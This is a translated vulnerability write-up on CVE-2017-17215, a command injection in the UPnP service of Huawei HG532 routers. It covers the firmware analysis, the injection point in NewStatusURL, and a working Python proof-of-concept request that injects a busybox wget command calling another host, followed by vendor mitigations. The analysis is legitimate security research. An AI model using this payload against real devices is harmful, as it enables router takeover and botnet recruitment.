Author: Fenix @ knows English version of Chuangyu 404 laboratory: https://paper.seebug.org/508/

background

Huawei hg532 series router is a high-speed wireless router product for home and small office users.

On November 27, 2017, the check point software technology department reported a remote command execution vulnerability (cve-2017-17215) in Huawei hg532 products [1].

Before the vulnerability was reported, there were a large number of unnoticed exploits of this kind of vulnerability on the Internet, covering many countries around the world. Payload has been identified as an upgraded version of the well-known virus Mirai, okiru / satori. The payload function is very simple. It mainly sends carefully crafted UDP / TCP messages to launch DDoS attacks on the target.

On November 23, 2017, it was known that the zoomeye network probe system of Chuangyu 404 laboratory also captured the payload of the attack.

Vulnerability analysis

Firmware Download

Hg532e version of the public firmware is available online, download address [2]

Download the firmware and extract it directly with binwalk.

The target system is MIPS 32-bit large end architecture.

Vulnerability analysis

According to the check point report [1], the vulnerability point of the remote command execution vulnerability is located in the UPnP service.

UPnP is created by the universal plug and play Forum (UPnP Gamma Forum). The goal of this protocol is to make all kinds of devices in home network (data sharing, communication and entertainment) and company network connect seamlessly with each other, and simplify the realization of related network.

The UPnP program responsible for UPnP service in firmware is directly thrown to IDA.

The vulnerability point is located through the string newstatus URL.

NewStatusURL

Trace data cross reference

The vulnerabilities are as follows

The definition of the ATP XML getchildnodebyname function is as follows.

The program first parses the soap XML message to get the values of the elements newdownloadurl and newstatusurl. Then the following splicing is carried out, and finally the system() function is called for execution.

snprintf($s0, 0x400, 'upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -', NewDownloadURL, NewStatusURL) system($s0)

Upg is an upgrade program of router. Its parameter functions are as follows.

upg

Now we have two command injection points, newdownloadurl and newstatusurl.

NewDownloadURL NewStatusURL

Vulnerability verification

The target system provides the following commands.

Use WGet command for vulnerability test. Send the following message.

import requests headers = { "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669" } data = '''<?xml version="1.0" ?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"> <NewStatusURL>;/bin/busybox wget -g 192.168.1.2 -l /tmp/1 -r /1;</NewStatusURL> <NewDownloadURL>HUAWEIUPNP</NewDownloadURL> </u:Upgrade> </s:Body> </s:Envelope> ''' requests.post('http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)

As you can see, we successfully received the request on the listening port.

It is worth mentioning that both the UPnP service and the firewall of hg532e router are enabled by default, and the default level of the firewall is low.

By default, access to port 37215 from WAN port will be blocked by firewall, and the vulnerability cannot be exploited.

Protection plan

On November 30, 2017, Huawei officially released a security notice [4], confirming the vulnerability. The following vulnerability mitigation measures are mentioned in the announcement

• Configure firewall in router
• Change router default password
• Deploy firewall outside router

Yes, no firmware upgrade package was found, so no patch analysis

summary

• Similar to setntpservers command injection [3], the vulnerability is a simple command splicing as a whole.
• This vulnerability also provides a good direction for our vulnerability mining. The program logic near snprintf(), system() and other functions should be focused on.
• Again, everything that goes into a function is harmful. Most of the remote command execution vulnerabilities are either incomplete filtering, resulting in command splicing. Or there is no variable length control, resulting in buffer overflow. In this regard, equipment suppliers should be responsible, and safety development awareness is very important.

Reference link

【1】 Check point vulnerability report https://research.checkpoint.com/good-zero-day-skiddie/ [2] hg532e firmware download https://ia601506.us.archive.org/22/items/routerhg532e/router% 20hg532e.rar [3] Irish broadband router settpserver command injection https://www.seebug.org/vuldb/ssvid-97024 [4] Huawei security bulletin http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en

This article was published by seebug paper. If you need to reprint it, please indicate the source. Address: https://paper.seebug.org/490/